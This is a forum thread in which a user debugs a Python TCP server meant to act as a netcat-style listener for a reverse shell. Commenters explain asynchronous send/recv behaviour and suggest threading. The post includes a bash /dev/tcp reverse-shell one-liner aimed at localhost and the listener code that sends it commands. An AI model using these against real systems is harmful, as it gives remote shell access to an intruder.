# Python server socket to send commands and receive output (netcat listener alike)

Tags: python, sockets, python-sockets

Im trying to play with python sockets trying to create a tcp listener server for incoming data from a reverse shell while launching some commands.
Tested with bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 as client while the server is running.
Here the code:

```
import socket  

s = socket.socket()  
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  

s.bind(('127.0.0.1',4444))  
s.listen(3)  

while True:  

    clientsocket,addr = s.accept()  
    print(f'connection from {addr} stablished')  

    print('Everything ok, jump to next while loop')  

    while True:  

        response = clientsocket.recv(99999).strip()  

        print(response.decode('utf-8'))  

        userinput = input('$: ')  
        command = userinput + '\r'  
        print('Check stage 1')  

        clientsocket.sendall(bytes(command,'utf-8'))  

        print('Check stage 2')
```

The only thing here is that for some reason Check stage 1 and Check stage 2 are executed before of sending the command.
In other hand the command to send is saved with the variable value of their last, not the current.
That means that we need to send the same command two times to receive the correct input/output.

My question is, how to prevent the input from being typed two times and how should be the correct flow of the program?

Comment: Why don't you receive the response *after* you send the command?

Comment: The ordering is as expected.  This is asynchronous processing.  `sendall` will return as soon as the packet is in the network stack.  It does not block until the other side has received it.  It can't do so; the recipient might be on the other side of the world.

Comment: Did you test the little program?@TimRoberts @user253751 I´ve trying everything pretending avoid from send command two times...for example, run the program, when client is conected write command 'clear' and press enter, nothing happens,press enter again, command is sended now, thats the main problem

Comment: Oh, this is the server. It might be because you get multiple blocks of receive data. So the first `recv` after the command just returns a newline or something, then the second one returns the command output? Maybe?

Comment: @user253751 okay...things turned weirdest now, i was capturing tcp localhost traffic(wireshark) where suppose the first command dissapeared...is not showing in the python server, but i can see the 'command output' in the capture. I really need help. Where is the error?.I suspect about input() function...as others

Comment: Definitely should be something related with the server tcp program flow... its all good in the capture.

Comment: @anotherdeveloper Probably the server is waiting in `input` so it isn't calling `recv`. In Python, you could do this simply by having two threads. One to receive and print the response, and one to input and send the command. OR you could make it so the client sends some special marker when it finishes the command, and make the server keep calling recv until it sees the special marker. Note that send and recv don't line up with each other. You can send "hello world\r", "this is a test\r" and receive "hel", "lo wo", "rld\rthis is", " a test\r" for example

Comment: okay @user253751 thank you a lot, so using threads or multithreads will solve this kind of issue related with the input/output? And I think that if you give the program a big buffer in recv, you will recive the correct data without break, Im not sure at all by the way. Should I try this weeks to learn threads and multithreads to solve this piece?

Comment: @anotherdeveloper No, you are not guaranteed to receive all the data without break, even with a big buffer. For all you know, the kernel could flip a coin and say "nope, you're not getting more than 5 bytes". The kernel doesn't flip coins like that, but it's allowed to. Practical reasons you might receive less include things like TCP segment limits - which you don't need to care about if you just keep receiving.

Comment: by the way, normally I wouldn't recommend threads to a beginner, but Python is an exception

Comment: @user253751 Bro, can you write for me an example in this script using threading? Im trying everything without success. I made functions etc to call them with target in threading module...but I cant make this thing work....Im stuck as never before in my life :(